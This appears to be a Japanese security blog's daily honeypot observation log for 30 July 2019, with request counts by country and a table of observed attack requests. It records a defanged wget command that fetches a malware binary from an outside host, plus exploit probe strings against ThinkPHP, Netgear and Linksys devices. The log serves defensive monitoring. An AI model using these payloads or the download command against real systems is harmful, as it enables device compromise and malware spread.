23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(136日目)

2019/07/30(火)

トータルは5508件でした。

ハンティングログは以下です。

90.69.142[.]188 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl

www.virustotal.com

IPのロケーション別の件数は以下です。

アメリ 4033
フィンランド 1035
スイス 405
ブラジル 7
中国 4
オランダ 3
エストニア 3
ギリシャ 2
トルコ 2
インド 2
インドネシア 2
イラン 2
イタリア 2
アルゼンチン 2
ロシア 2
メキシコ 2
ルーマニア 1
フランス 1
ドイツ 1
ブルガリア 1
アゼルバイジャン 1
バングラデシュ 1
コロンビア 1
韓国 1
カンボジア 1
パキスタン 1

f:id:sec23:20190731125450p:plain

件数 概要 リクエス
5445 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
55 アクセス GET /
1 LinksysルータのEシリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 バージョン調査? GET /version
1 Netgearの調査 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 Servletの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
1 phpMyAdminの調査 GET /admin-scripts.asp
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php